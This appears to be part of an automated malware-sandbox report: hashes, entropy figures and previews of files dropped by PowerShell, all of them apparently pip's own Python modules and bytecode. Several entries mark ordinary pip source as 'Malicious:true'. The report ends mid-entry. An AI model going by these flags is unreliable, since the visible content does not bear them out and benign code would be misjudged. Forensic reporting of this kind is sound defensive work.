                                                                                                                                                                                                                              Preview:........|.Vf.!..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j8..................e.........Z.e.e.....Z.e.e.....Z e.e.g.e.e.....f.....Z!e.e.g.e"f.....Z#..G.d...d.........Z$d.e%d.e"f.d...Z&..G.d...d.........Z'..G.d...d.e$........Z(..G.d...d.e$........Z)..G.d...d.e$........Z*..G.d...d.e$........Z+d.e%d.e!d.e#d.e"d.e"d.e%d.e.e.e%....e.e$....f.....f.d...Z,y.)......N)...defaultdict)...Callable..Dict..Iterable..List..Optional..Tuple)...InvalidSdistFilename..InvalidVersion..InvalidWheelFilename..canonicalize_name..parse_sdist_filename..parse_wheel_filename)...InstallationCandidate)...Link)...path_to_url..url_to_path)...is_urlc.....................@.....e.Z.d.Z.e.d.e.e.....f.d...........Z.d.e.f.d...Z.d.e.f.d...Z.y.)...LinkSource..returnc...........................t...................).z,Returns the underlying link, if there's one.....NotImplementedError....s
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16590
                                                                                                                                                                                                                              Entropy (8bit):4.561146070645825
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:/CZ8RT0uMwx3TZSjPk670hWD3l73Nrha5MTKfPYO7O/zzeqijsL2/h:/CZalMw31QcXWD17dAKSPYOQ+qiDh
                                                                                                                                                                                                                              MD5:6116960555D703F74AB580A66D0C09EF
                                                                                                                                                                                                                              SHA1:2A1719BBD11CCD34447F2E2C2B76751BF61F6297
                                                                                                                                                                                                                              SHA-256:B07D2D2FF70EA0293AA4B2DF0921958C5338ACF109B65945F95A1BBC0BCB487E
                                                                                                                                                                                                                              SHA-512:877C923379AA12E0255155CABBB96D6C13F9388DE5C9D07026EE0CCBE0BF388B384719ECF47398000C5EFF5E371D62261F545521403BFBCF90A26B8A30FBC56C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:""".The main purpose of this module is to expose LinkCollector.collect_sources().."""..import collections.import email.message.import functools.import itertools.import json.import logging.import os.import urllib.parse.import urllib.request.from html.parser import HTMLParser.from optparse import Values.from typing import (. TYPE_CHECKING,. Callable,. Dict,. Iterable,. List,. MutableMapping,. NamedTuple,. Optional,. Sequence,. Tuple,. Union,.)..from pip._vendor import requests.from pip._vendor.requests import Response.from pip._vendor.requests.exceptions import RetryError, SSLError..from pip._internal.exceptions import NetworkConnectionError.from pip._internal.models.link import Link.from pip._internal.models.search_scope import SearchScope.from pip._internal.network.session import PipSession.from pip._internal.network.utils import raise_for_status.from pip._internal.utils.filetypes import is_archive_file.from pip._internal.utils.misc import redact_auth_f
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):37843
                                                                                                                                                                                                                              Entropy (8bit):4.380689772828681
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:DrYga2L2sCfAGvpydxn1iqpohZfvYhz5Nic4:DrZa2L2sCfAg0dx1iAorfvYhz5g
                                                                                                                                                                                                                              MD5:DE39B54F2CA84B93D5563F8A6F50C4B4
                                                                                                                                                                                                                              SHA1:1697A67011E2F17C399C784778755E8518FA4B1C
                                                                                                                                                                                                                              SHA-256:4BF9C2F20CD520C63A8A459F2A848ECD1B687AC52A9DF36100F97F07048EBAC0
                                                                                                                                                                                                                              SHA-512:7BDCFAFA7819D8C457218E97E6D0DE52902567B45F7022533D4FB5C70B250FE82950EEB4773C8EF0FE0EDD7ACCDE231E5D555585099F4AD0D58AA98F208FAD59
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Routines related to PyPI, indexes"""..import enum.import functools.import itertools.import logging.import re.from typing import TYPE_CHECKING, FrozenSet, Iterable, List, Optional, Set, Tuple, Union..from pip._vendor.packaging import specifiers.from pip._vendor.packaging.tags import Tag.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import _BaseVersion.from pip._vendor.packaging.version import parse as parse_version..from pip._internal.exceptions import (. BestVersionAlreadyInstalled,. DistributionNotFound,. InvalidWheelFilename,. UnsupportedWheel,.).from pip._internal.index.collector import LinkCollector, parse_links.from pip._internal.models.candidate import InstallationCandidate.from pip._internal.models.format_control import FormatControl.from pip._internal.models.link import Link.from pip._internal.models.search_scope import SearchScope.from pip._internal.models.selection_prefs import SelectionPreferences.from pip._intern
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8688
                                                                                                                                                                                                                              Entropy (8bit):4.5911644166334025
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:tMRN1Nf9Bc11X/9+E0AgO7yxtn1daV2yEsWWOFfet3Zhfi1dBzO4g0lFb0ev3K1o:wcT9+c7y/HZjF8hfIh9c8m4xkTC
                                                                                                                                                                                                                              MD5:9F4F417D8C5299B25A4AFEC8D0C942DC
                                                                                                                                                                                                                              SHA1:DC58845DC62CA823E3EA9E7DB6EA5D8B2FB7B4F3
                                                                                                                                                                                                                              SHA-256:7497A0891F5FF3A92C95A00772FF7E4792FF5C17F94739BF164C8FB5E0EE3F12
                                                                                                                                                                                                                              SHA-512:0344B7B8669C19802F91F92A5EBACB6B6EFACABFEB771B6E782D629D273BB6DD7A8BFF72B93B868BE44F7B31B148FFFDE75E2507B0E8EB2F7A22D4047878CB5D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import logging.import mimetypes.import os.from collections import defaultdict.from typing import Callable, Dict, Iterable, List, Optional, Tuple..from pip._vendor.packaging.utils import (. InvalidSdistFilename,. InvalidVersion,. InvalidWheelFilename,. canonicalize_name,. parse_sdist_filename,. parse_wheel_filename,.)..from pip._internal.models.candidate import InstallationCandidate.from pip._internal.models.link import Link.from pip._internal.utils.urls import path_to_url, url_to_path.from pip._internal.vcs import is_url..logger = logging.getLogger(__name__)..FoundCandidates = Iterable[InstallationCandidate].FoundLinks = Iterable[Link].CandidatesFromPage = Callable[[Link], Iterable[InstallationCandidate]].PageValidator = Callable[[Link], bool]...class LinkSource:. @property. def link(self) -> Optional[Link]:. """Returns the underlying link, if there's one.""". raise NotImplementedError().. def page_candidates(self) -> FoundCandidates:. ""
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15365
                                                                                                                                                                                                                              Entropy (8bit):4.814507131821125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:OdFSftlYe423JTFZAj5iC7SCrEYuGcrgoqa6DxbLCLax3GZIOkeFIqK2RrRlFRoB:OdFSllF4sMwZ9b7qa6DpGjrNRs
                                                                                                                                                                                                                              MD5:42097813533BC9F4A543ED8749B0DC4D
                                                                                                                                                                                                                              SHA1:A4A9AF510C13B0BB0DC6B2DDFA089D570409A749
                                                                                                                                                                                                                              SHA-256:0E1F0B2561BC2D19432B82488FDB1F445F7A4D113313EF8DFC0225C7B4EAA1EE
                                                                                                                                                                                                                              SHA-512:4FCBB5BB4E960E75D75ABFC8522767A40DFD7DEE606C74073D4DED92453A438635A7777981EE08E32C27E03A63C49AD9DCA74175D92A20C53CD81F7916206E8A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import functools.import logging.import os.import pathlib.import sys.import sysconfig.from typing import Any, Dict, Generator, Optional, Tuple..from pip._internal.models.scheme import SCHEME_KEYS, Scheme.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.deprecation import deprecated.from pip._internal.utils.virtualenv import running_under_virtualenv..from . import _sysconfig.from .base import (. USER_CACHE_DIR,. get_major_minor_version,. get_src_prefix,. is_osx_framework,. site_packages,. user_site,.)..__all__ = [. "USER_CACHE_DIR",. "get_bin_prefix",. "get_bin_user",. "get_major_minor_version",. "get_platlib",. "get_purelib",. "get_scheme",. "get_src_prefix",. "site_packages",. "user_site",.]...logger = logging.getLogger(__name__)..._PLATLIBDIR: str = getattr(sys, "platlibdir", "lib").._USE_SYSCONFIG_DEFAULT = sys.version_info >= (3, 10)...def _should_use_sysconfig() -> bool:. """This function determines the value
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16758
                                                                                                                                                                                                                              Entropy (8bit):5.517778262155728
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:7ozXl74tbChc26p9eilj05jF3a7PDd+wven1Kt:7orl4/eilj65gBWn1Kt
                                                                                                                                                                                                                              MD5:A279DDAD1908CC84B87D8E441D31F893
                                                                                                                                                                                                                              SHA1:EC404EFDCAFFC27A3EB0BB8BCAC9689F88636B24
                                                                                                                                                                                                                              SHA-256:49C9C676EE3D238EAFD25B9BF69301AC81D3954273D8A018E36D70A12FA85ACD
                                                                                                                                                                                                                              SHA-512:C80837041C48C0A9B24FE5E41D954E07B1144D0C1D84AF7D4714AB2D21D159CBBFE32448922A5746ABD959B5A087A77E3360B78E6B5C33A7B32275B12C52FB6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.<........................r.....U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...g.d...Z...e.j>..................e ........Z!..e"e.d.d.........Z#e$e%d.<...e.jL..................d.k\..Z'd.e(f.d...Z)..e)........Z*e*s.d.d.l.m+Z+..e'r.e*s.e.jX..................Z-n.e.j\..................Z-d.e(f.d...Z/d.e.e$e$f.....d.e(f.d...Z0..e.jb..................d...........d.e(f.d...........Z2..e.jb..................d...........d.e(f.d...........Z3..e.jb..................d...........d.e(f.d...........Z4..e.jb..................d...........d.e(f.d...........Z5..e.jb..................d...........d.e(f.d...........Z6d.e.e$....d.e.e$d.d.f.....f.d...Z7..e.jb..................d...........d.e.jp..................d.e.jp..................d.e$d.d.f.d ..........Z9d.e.jp..................d.e.jp..................d.e$d.e(f.d!..Z:..e.jb..................d...........d"d.d.d.d#..d$e(d%
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6838
                                                                                                                                                                                                                              Entropy (8bit):5.525923683279458
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4A4mRlJske9uLhnTdMZaIvdrwVVlgznaoix4F5dJEUlVzW:ThRrEDvdrehoBFJECa
                                                                                                                                                                                                                              MD5:62B5BD37DF04ADDB0AA4D6545D98680A
                                                                                                                                                                                                                              SHA1:C81424FFF30CD3B694E878B300A5D30E4486AAA0
                                                                                                                                                                                                                              SHA-256:0AA4F79F7F6C777F8CF2C8988AB593D97BBB85E167182CF7911BE355EE0ACC73
                                                                                                                                                                                                                              SHA-512:E5232AD3129348F0C09B2E0C20FD0589B3BCE123C053CFB84E3BD13404E9C90E7D32FF989A36B5537C2EF81A3AAF246C98EECF749181E34C74CBFCBFFCD22588
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfy...............................d.Z.....e.d.........j.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j>..................e ........Z!..........d.d.d...d.e"d.e#d.e.e"....d.e.e"....d.e#d.e.e"....d.e#d.e.e"e"f.....f.d...Z$..........d.d.e"d.e#d.e.e"....d.e.e"....d.e#d.e.e"....d.e.f.d...Z%d.e"f.d...Z&d.e"f.d...Z'd.e"f.d...Z(y.#.e.e.f.$.r...Y...w.x.Y.w.).z7Locations where we look for configs, install stuff, etc.._distutils_hack.....N)...Command)...SCHEME_KEYS)...install....get_python_lib)...Dict..List..Optional..Union..cast)...Scheme)...WINDOWS)...running_under_virtualenv.....)...get_major_minor_versionF)...ignore_config_files..dist_name..user..home..root..isolated..prefixr......returnc..........................d.d.l.m.}...d.|.i.}.|.r.d.g.|.d.<.....|.|.........}.|.s...|.j.............................d.}.|.j...................d.d...........}.|...J..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7993
                                                                                                                                                                                                                              Entropy (8bit):5.488844015835542
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:5XaHI7MYoLOb/Gp0TgEHoKTZikflZ1WVnrJTLAUUZLmO/JMRg5nHNQNRSiEkEuA6:5q7cP0EtiopWJrZLAUUZLTNWruLwfSs
                                                                                                                                                                                                                              MD5:B0C7CAEA424E4E9A120ED2550AEE3080
                                                                                                                                                                                                                              SHA1:4542FE97F2C25796C334B9BCE4A354927DBCB432
                                                                                                                                                                                                                              SHA-256:0E48B653FABF4E687711E59D155B02FE8B6C5F1A9ABE6E8E253A0545F71B8CC3
                                                                                                                                                                                                                              SHA-512:EA06D2DFB3E86ED84AFC761C5F53783FAB9DA02A7CE22F1D4A98139436CD012685FB9ADE69E933F2E41DA81E6465C3FB2F6FFA08470CC0B7253DFA3202C9D882
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.....e.j"..................e.........Z...e...e.j*..................................Z...e.e.d.d.........Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.g.d...Z...e.j@..................d...........e.jC..................d.....................d.d.e.d.e.d.e.jD..................e.....d.e.jD..................e.....d.e.d.e.jD..................e.....d.e.f.d...Z#d.e.f.d...Z$d.e.f.d...Z%d.e.f.d...Z&y.)......N)...InvalidSchemeCombination..UserInstallationInvalid)...SCHEME_KEYS..Scheme)...running_under_virtualenv.....)...change_root..get_major_minor_version..is_osx_framework..get_preferred_scheme..returnc.....................D.....d.t.........v.x.r...t...................x.r...t.................S.).a....Check for Apple's ``osx_framework_library`` scheme... Python distributed by Apple's Command Line Tools has this special scheme. that's used when:..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3763
                                                                                                                                                                                                                              Entropy (8bit):5.22193507705798
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:7iLYMKBXGjWf//ytblRlZlpF3ajAR7CTJ3y1/zR5Pe1baYXDDmC5OMi:7jM6XGjYYJVliM2T1ypeUsH5OMi
                                                                                                                                                                                                                              MD5:50549762BE26CA7A5192AF86326D640A
                                                                                                                                                                                                                              SHA1:987B924ED2CFF5FE5953E2B6C61C759463E64DE2
                                                                                                                                                                                                                              SHA-256:E67B89B07AE9592A00983A0815C311597CEADD63CECA649A3C13CF942175004E
                                                                                                                                                                                                                              SHA-512:6E6CACE9BF0B5C7E4C333F1CE767C69C0F92F8133A3986DED550F86013D3D31E451A3F661E8E9D82671CA9CD07FFDBF388785082B0D4BCB87ECB72AE706FA151
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................d.........Z...e.j...................d.........Z.e.e.d.<...d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.f.d...Z.....e.j*..........................Z.e.j...................e.....e.d.<.....e.j4..................d...........d.e.f.d...........Z.y.#.e.$.r...e.j2..................Z.Y..0w.x.Y.w.)......N)...InstallationError)...appdirs)...running_under_virtualenv..pip..purelib..site_packages..returnc.....................<.......d.j...................t.........j.....................S.).ze. Return the major-minor version of the current Python as a string, e.g.. "3.7" or "3.10".. z.{}.{})...format..sys..version_info........MC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/locations/base.py..get_major_minor_versionr........s............7.>.>.3..+..+..,..,r......new_root..pathnamec...........................t.........j...................d
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6009
                                                                                                                                                                                                                              Entropy (8bit):4.6472416335794415
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:RF98DyqqXDIMgcuWM/1DAg/K2uD3A0lgznaoi8RbdLiF4WNZCjKc9Gv:RF98DyqqsnctM/ymcoZRxj8Q26Gv
                                                                                                                                                                                                                              MD5:E1354E87EC259E8DC27206CB2D011AA0
                                                                                                                                                                                                                              SHA1:10CDF71B7814400226BFCE22B99AB43B5FE7C6C5
                                                                                                                                                                                                                              SHA-256:1FD6472BFDF9ADD0D5D50B268B841E68150B8C54F831BBBA42EA151A427A4072
                                                                                                                                                                                                                              SHA-512:7E7E1F9A020EDD0C6399495BD80F2D692E85FCD859A21935AA92EB3CE7D628663EF04679EF89D732E03D90E8D8F08F89826835632135BF10ABBF0B6C444A7072
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Locations where we look for configs, install stuff, etc"""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..# If pip's going to use distutils, it should not be using the copy that setuptools.# might have injected into the environment. This is done by removing the injected.# shim, if it's injected..#.# See https://github.com/pypa/pip/issues/8761 for the original discussion and.# rationale for why this is done within pip..try:. __import__("_distutils_hack").remove_shim().except (ImportError, AttributeError):. pass..import logging.import os.import sys.from distutils.cmd import Command as DistutilsCommand.from distutils.command.install import SCHEME_KEYS.from distutils.command.install import install as distutils_install_command.from distutils.sysconfig import get_python_lib.from typing import Dict, List, Optional, Union, cast..from pip._internal.models.scheme import Scheme.from pip._internal.utils.compat import WINDOWS.from pip
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7680
                                                                                                                                                                                                                              Entropy (8bit):4.866991580048859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:JdCOcPkYiopsT6b9LstdkNBRVzXG9eSvwY33Ast:Jd5cPRiopsubhs3kvRieSFR
                                                                                                                                                                                                                              MD5:7BB5B79402F716198A5CE0A8D07929E4
                                                                                                                                                                                                                              SHA1:9AB439BD5F5B0F6478D0DC17DA2FA87733F01F32
                                                                                                                                                                                                                              SHA-256:8F2355B547CC21FD26B7263E5E9D66F7243C8B0102A334955459A390DF5ADB2C
                                                                                                                                                                                                                              SHA-512:F3AB05449D50ABCB688C6BF9BFDBC58EA8D7626093EBC98CE7E39881FFD66AE88A10C1A64CA37CF99391DC52F065E4C28D6345AD407DE3E7FFC12C6FCAC2AB32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import logging.import os.import sys.import sysconfig.import typing..from pip._internal.exceptions import InvalidSchemeCombination, UserInstallationInvalid.from pip._internal.models.scheme import SCHEME_KEYS, Scheme.from pip._internal.utils.virtualenv import running_under_virtualenv..from .base import change_root, get_major_minor_version, is_osx_framework..logger = logging.getLogger(__name__)...# Notes on _infer_* functions..# Unfortunately ``get_default_scheme()`` didn't exist before 3.10, so there's no.# way to ask things like "what is the '_prefix' scheme on this platform". These.# functions try to answer that with some heuristics while accounting for ad-hoc.# platforms not covered by CPython's default sysconfig implementation. If the.# ad-hoc implementation does not fully implement sysconfig, we'll fall back to.# a POSIX scheme..._AVAILABLE_SCHEMES = set(sysconfig.get_scheme_names()).._PREFERRED_SCHEME_API = getattr(sysconfig, "get_preferred_scheme", None)...def _should_use_osx_fram
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2556
                                                                                                                                                                                                                              Entropy (8bit):4.7400258499487755
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:xNd8HSftSqBN9bjWfq2KF3aAgoZri6dQWJjaRgLGhNlpLKGBfhRwnA/8OZ:Hd8ykq5jZGoTdQgygLGvl1WOZ
                                                                                                                                                                                                                              MD5:DF3959ADC2DB3EB93E958438AD137A98
                                                                                                                                                                                                                              SHA1:B8E2670E06883B1AC1244F41EB9D63B50704C3CE
                                                                                                                                                                                                                              SHA-256:45088F8B5778155336071934E1D4215D9D8FAA47A58C42F67D967D498A8843BF
                                                                                                                                                                                                                              SHA-512:81E4C30D31B670524C1BC9CDE2395F212025D6EDD14A1489932CA5220CF49423B99E4B38A76BA5243AF6931B1CB7050AA0AE4BCD09D46D403D3C7185350C8EB0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import functools.import os.import site.import sys.import sysconfig.import typing..from pip._internal.exceptions import InstallationError.from pip._internal.utils import appdirs.from pip._internal.utils.virtualenv import running_under_virtualenv..# Application Directories.USER_CACHE_DIR = appdirs.user_cache_dir("pip")..# FIXME doesn't account for venv linked to global site-packages.site_packages: str = sysconfig.get_path("purelib")...def get_major_minor_version() -> str:. """. Return the major-minor version of the current Python as a string, e.g.. "3.7" or "3.10".. """. return "{}.{}".format(*sys.version_info)...def change_root(new_root: str, pathname: str) -> str:. """Return 'pathname' with 'new_root' prepended... If 'pathname' is relative, this is equivalent to os.path.join(new_root, pathname).. Otherwise, it requires making 'pathname' relative and then joining the. two, which is tricky on DOS/Windows and Mac OS... This is borrowed from Python's standard
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):340
                                                                                                                                                                                                                              Entropy (8bit):4.624535788985788
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1REYB9HH3G5laLRIIQrHGKGX+KLELwJqWl3VY2wVdLcJ+9EWaFSQ3Z/IRkpdln:1REYB925glIRro+dCle2+LcJWGORMl
                                                                                                                                                                                                                              MD5:0BB4FE239F44137D18D96E9ECB11195E
                                                                                                                                                                                                                              SHA1:442943CD1FA0793DD0A43F75DA3843AE3F9C67DE
                                                                                                                                                                                                                              SHA-256:AFE52751EF072E8E57149CFC8A74DC38E4E2BBFB313618076FA57094652594E2
                                                                                                                                                                                                                              SHA-512:D0BC69F04490BA5B312223F10D854E8ED6BCEFF8F58E45FA0C7C0DB304B4D912A3BE565E02FE858459E49EBFCA4665677CF66A2137F6754C3A4A573076100291
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import List, Optional...def main(args: Optional[List[str]] = None) -> int:. """This is preserved for old console scripts that may still be referencing. it... For additional details, see https://github.com/pypa/pip/issues/7498.. """. from pip._internal.utils.entrypoints import _wrapper.. return _wrapper(args).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4339
                                                                                                                                                                                                                              Entropy (8bit):4.78736796617486
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:mkwC9i3293+/9QZRaCo4gR8+Gt68rly/tRDSg:m8ieRZRaD4g8+GEYly/tVSg
                                                                                                                                                                                                                              MD5:3A438AE5A4F53D86071F39E033A9239D
                                                                                                                                                                                                                              SHA1:27F3DDFC360D5F981F11DAE326EDE574B7519713
                                                                                                                                                                                                                              SHA-256:F695375B7B3EE87B6316E62159C2D36159926B38A494FBFB936C7CA7B5F51A60
                                                                                                                                                                                                                              SHA-512:0FAE6D35237331D6875CC927E3FAE4DF680D178D66B11571B7BAB988F5244D77497209A579B0AAE837575019B013B12F0963B6E5321D768CD1DBCFA2C2DDDFA5
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import contextlib.import functools.import os.import sys.from typing import TYPE_CHECKING, List, Optional, Type, cast..from pip._internal.utils.misc import strtobool..from .base import BaseDistribution, BaseEnvironment, FilesystemWheel, MemoryWheel, Wheel..if TYPE_CHECKING:. from typing import Literal, Protocol.else:. Protocol = object..__all__ = [. "BaseDistribution",. "BaseEnvironment",. "FilesystemWheel",. "MemoryWheel",. "Wheel",. "get_default_environment",. "get_environment",. "get_wheel_distribution",. "select_backend",.]...def _should_use_importlib_metadata() -> bool:. """Whether to use the ``importlib.metadata`` or ``pkg_resources`` backend... By default, pip uses ``importlib.metadata`` on Python 3.11+, and. ``pkg_resourcess`` otherwise. This can be overridden by a couple of ways:.. * If environment variable ``_PIP_USE_IMPORTLIB_METADATA`` is set, it. dictates whether ``importlib.metadata`` is used, regardless of Python. ver
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5864
                                                                                                                                                                                                                              Entropy (8bit):5.3690683106192925
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QBHxwC9i3293+X6aYgrKSVf94Gtlv5rVv/75DHRm97oLwB:QBHJiew6aYKJVF4GbvRp/7txm970wB
                                                                                                                                                                                                                              MD5:D57261F1631280852B7492855F37AF36
                                                                                                                                                                                                                              SHA1:7C83CECB5F1AD0588300304A1182819DE1148924
                                                                                                                                                                                                                              SHA-256:ACB8456FF5FFBC1A2F936EE83C236537333ABC4B831E878882D6FE2336AA8D8E
                                                                                                                                                                                                                              SHA-512:520C187705323300219459FF377902EEFCC3CA058F6B8FB402A56CDCD2AA39BDB65C8FBE3F798A88F3FB5759B0F29750CBB0795E51778BFDD6762CAB7B8E31EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................H.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z.m.Z...n.e.Z.g.d...Z.d.e.f.d...Z...G.d...d.e.........Z...e.j2..................d...........d.e.f.d...........Z.d.e.f.d...Z.d.e.e.e.........d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e d.e.d.e.d.e.f.d...Z!y.)......N)...TYPE_CHECKING..List..Optional..Type..cast)...strtobool.....)...BaseDistribution..BaseEnvironment..FilesystemWheel..MemoryWheel..Wheel)...Literal..Protocol).r....r....r....r....r......get_default_environment..get_environment..get_wheel_distribution..select_backend..returnc.....................$.....t.........j...................t.........t.................5...t.........t.........t.........j...................d.....................c.d.d.d...........S.#.1.s.w...Y.....n.x.Y.w.t.........j...................d.k...r.y.d.d.l.}.t.........t.........|.j...................d.d.................S.).a....Whether to use the ``i
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2857
                                                                                                                                                                                                                              Entropy (8bit):5.67925311390842
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:m9Zmmf2mPP2Xv+mbQlui0E7Z7XiLKRZEZvxvu3JA/6OH/haRm4wDf0s4Vk/0b:m9hf2mPU+W24E7Z7yLIEZJvWJ0tfh1DQ
                                                                                                                                                                                                                              MD5:C26399FE6C2B446C9C2CC148C5D20D9B
                                                                                                                                                                                                                              SHA1:1866CFD7180D5333E2809F90ED20C1938577C8F6
                                                                                                                                                                                                                              SHA-256:A69AC85E135AF3BE2EC8BEE50B08C306CED5425690CED45498205D3DAD973A5C
